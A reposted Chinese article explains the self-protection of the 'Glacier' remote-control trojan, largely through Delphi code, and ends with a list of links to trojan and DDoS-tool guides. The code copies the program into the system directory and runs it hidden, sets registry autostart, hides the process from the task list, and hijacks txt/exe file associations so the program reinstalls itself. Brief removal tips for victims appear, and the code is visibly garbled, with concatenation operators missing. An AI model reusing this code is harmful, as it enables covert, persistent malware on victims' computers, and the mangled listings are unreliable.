当前位置: 移动技术网 > 网络运营>安全>工具 > 冰河”启示录

冰河”启示录

2019年05月25日  | 移动技术网网络运营  | 我要评论
冰河”启示录 作者: 陈经韬 前言:我经常在杂志和报刊上看到此类标题的文章,但大多是骗稿费的,没有任何技术含量.于是一气之下写了这编东西.本人声明如下:(一)本人对"冰河"及其作者没有任何不满,相反,作者肯帮助初学者的态度是我们每一个人都应该学习的.(二)本文的目的在于交流编程经验,没有任何其它不良企图.(三)在一些领域,我们理应宁可自制力让我们的预见力保持寂寞,也不要去做一个打开潘多拉盒子的先知。所以一些更厉害的方法我们现在不会提,以后也不会                    (1) “冰河”是有名的用c builder编写的国产远程管理软件,其自我的功能保护很强,下面就以delphi为例谈一谈它的原理,希望对大家有一些启发. 一、程序安装 此类程序一般会把自己隐藏起来运行,通常不外乎以下几种方法:自我拷贝法、资源文件法、网页方式安装、类病毒捆绑法(如yai).自我拷贝法适用于本身就一个文件,资源文件法可以同时安装好几个文件,网页方式安装要先向m$交钱换安全签证,类病毒捆绑法利用了病毒的原理.本文只介绍自我拷贝法,其它方法请到我的个人主页去看.http://lovejingtao.126.com 1:自我拷贝法 这种方法的原理是程序运行时先查看自己是不是在特定目录下,如果是就继续运行,如果不是就把自己拷贝到特定目录下,然后运行新程序,再退出旧程序. 打开delphi,新建一个工程,在窗口的create事件中写代码: procedure tform1.formcreate(sender: tobject); var myname: string; begin myname := extractfilename(application.exename); //获得文件名 if application.exename < > getwindir myname then //如果文件不是在windows\system\那么.. begin copyfile(pchar(application.exename), pchar(getwindir myname), false);{将自己拷贝到windows\system\下} winexec(pchar(getwindir myname), sw_hide);//运行windows\system\下的新文件 application.terminate;//退出 end; end; 其中getwindir是自定义函数,起功能是找出windows\system\的路径. function getwindir: string; var buf: array[0..max_path] of char; begin getsystemdirectory(buf, max_path); result := buf; if result[length(result)]< > '\' then result := result '\'; end; 另外,为了避免同时运行多个程序的副本(节约系统资源也),程序一般会弄成每次只能运行一个.这又有几种方法. 一种方法是程序运行时先查找有没有相同的运行了,如果有,就立刻退出程序. 修改dpr项目文件,修改begin和end之间的代码如下: begin application.initialize; if findwindow('tform1','form1')=0 then begin //当没有找到form1时执行下面代码 application.showmainform:=false; //不显示主窗口 application.createform(tform1, form1); application.run; end; end. 另一种方法是启动时会先通过窗口名来确定是否已经在运行,如果是则关闭原先的再启动。“冰河”就是用这种方法的。 这样做的好处在于方便升级.它会自动用新版本覆盖旧版本. 方法如下:修改dpr项目文件 uses forms,windows,messages, unit1 in 'unit1.pas' {form1}; 为了程序能在windows每次启动时自动运行,可以通过六种途径来实现.“冰河”用注册表的方式。 加入registry单元,改写上面的窗口create事件,改写后的程序如下: procedure tform1.formcreate(sender: tobject); const k = '\software\microsoft\windows\currentversion\runservices'; var myname: string; begin {write by lovejingtao,http://lovejingtao.126.com,lovejingtao@21cn.com} myname := extractfilename(application.exename); //获得文件名 if application.exename < > getwindir myname then //如果文件不是在windows\system\那么.. begin copyfile(pchar(application.exename), pchar(getwindir myname), false);{//将自己拷贝到windows\system\下} winexec(pchar(getwindir myname), sw_hide);//运行windows\system\下的新文件 application.terminate;//退出 end; with tregistry.create do try rootkey := hkey_local_machine; openkey( k, true ); writestring( 'syspler', application.exename ); finally free; end; end; 为了让程序用alt del ctrl看不见,在implementation后添加声明: function registerserviceprocess(dwprocessid, dwtype: integer): integer; stdcall; external 'kernel32.dll'; 再在上面的窗口create事件加上一句:registerserviceprocess(getcurrentprocessid, 1);//隐藏 启示1:当我们中了“冰河”,如果被对方上了密码而无法自己卸载时,可以先找出是什么文件,然后自己配置一个没有密码的来运行,这样它就会把原来有密码的覆盖掉,自己就可以轻松用它的卸载功能把它卸掉.如果你会编程,也可以自己写一个"清除器"了,方法是先查找到窗口名,向它发送退出命令,再把它删除即可.                   (2) “冰河”的自我功能保护很强,它一般通过txt或exe文件关联来达到自我恢复.所以有很多人明明把它杀掉了,但重新启动时又会出现.下面举以txt文件关联为例. 打开delphi,新建一个工程,在窗口的create事件中写代码: uses registry procedure tform1.formcreate(sender: tobject); const kkk = '\software\microsoft\windows\currentversion\runservices'; const k = '\txtfile\shell\open\command'; var sfilename:string; begin //****************************************************** with tregistry.create do //写注册表,让程序跟文本文件关联 try rootkey := hkey_classes_root; openkey( k, true ); {write by lovejingtao,http://lovejingtao.126.com} writestring( '', application.exename ' "%1" '); {write by lovejingtao,lovejingtao@21cn.com} finally free; end; //******************************************************* with tregistry.create do //写注册表,每次启动时自动运行 try rootkey := hkey_local_machine; openkey( kkk, true ); writestring( 'mytray', application.exename ); finally free; end; //******************************************************** if fileexists(pchar(getwindir 'sysplay.exe'))=false then//如果文件已经删除 begin copyfile;//自定义拷贝资源文件过程 winexec(pchar(getwindir 'sysplay.exe'),sw_hide); end; //********************************************************** if paramcount> 0 then begin (* 有执行参数传入 *) sfilename:=paramstr(1); (* 取得参数内容 *) winexec(pchar('notepad.exe ' sfilename),sw_show);(*用记事本打开*) //winexec(pchar( sfilename),sw_show); end; //******************************************************* application.terminate;//退出 end; 如果要改为与exe文件关联,只要把"const k = '\txtfile\shell\open\command';"改为 "const k = '\exefile\shell\open\command';",把"winexec(pchar('notepad.exe ' sfilename),sw_show);" 改为"winexec(pchar( sfilename),sw_show);"即可.当然,还要加入是否退出windows而运行的rundll32.dll, 否则会因为关联exe文件而退不出windows. 启示2:手工删除“冰河”时,还要改掉它的保护功能,不能让它恢复.如果是关联了文本文件,先改注册表让它不能自动运行,重启后不要打开文本文件,立刻进到其安装目录把它删除.如果是关联了exe文件,那只有回到dos下删.切记:一定要把两个文件同时删掉,否则你重启后会发现文件又恢复了.

您可能感兴趣的文章:

如对本文有疑问, 点击进行留言回复!!

相关文章:

  • 网络刺客2使用指南

    网络刺客2使用指南    “天行”推出网络刺客2已有一年,想当初此软件因其强大的功能被国内“黑”界推为惊世之作。我在得到它后,却有近半年时间在研究、寻找... [阅读全文]

  • 冰河”启示录

    冰河”启示录 作者: 陈经韬 前言:我经常在杂志和报刊上看到此类标题的文章,但大多是骗稿费的,没有任何技术含量.于是一气之下写了这编东西.本人声明如下:(一)... [阅读全文]

  • tfn2k使用方法和对策(3)

        tfn2k使用方法和对策(3) 作者:佳佳 本来想再分两次写完本文,后来发现佳佳要翻译的两篇文章 http://packetstorm... [阅读全文]

  • tfn2k使用方法和对策(2)

        tfn2k使用方法和对策(2) 作者:佳佳     佳佳继续上一次的文章,这一次是攻击测试。 测试环境:     共有5台机器,佳佳是... [阅读全文]

  • 火凤凰2.4使用教程

    今次给大家推荐的是阿风哥的作品:无赖小子。(way).说起来它普及的不广,但是面孔生疏的马儿更加隐蔽。不是众杀毒软件的众矢之的。好像不太容易被查杀。而且作者够仗... [阅读全文]

  • tfn2k使用方法和对策(1)

        tfn2k使用方法和对策(1) 作者:佳佳 今年年初,一些黑客使用DDoS向Yahoo,eBay等著名站点发起攻击,并且使y... [阅读全文]

  • 火凤凰2.0使用教程

    火凤凰是国产木马里最先使用反弹端口的木马,其避开防火墙的能力极其出色,DELPHI编写,功能较多但是不太好用,而且没有配置服务端的改变端口功能,相对而言比较危险... [阅读全文]

  • Nmap网络安全扫描器说明(5)

    Nmap网络安全扫描器说明(5) 作者:作者:Fyodor 译者:quack发布日期:2002-2-6上传日期:2002-2-6来源:不详扫描范例-------... [阅读全文]

  • Nmap网络安全扫描器说明(3)

    Nmap网络安全扫描器说明(3) 作者:作者:Fyodor 译者:quack发布日期:2002-2-6上传日期:2002-2-6来源:不详常规选项-------... [阅读全文]

  • 不需要任何密码就能达到进入中有冰河的机器!!!

    不需要任何密码就能达到进入中有冰河的机器!!!小飞刀 [[冰河第一站]]冰河出现到现在,使用得如此之广,影响如此之大。 却万万没有人想到冰河服务端竟然存在着如此... [阅读全文]
验证码:
最近更新的文章
大家感兴趣的文章
移动技术网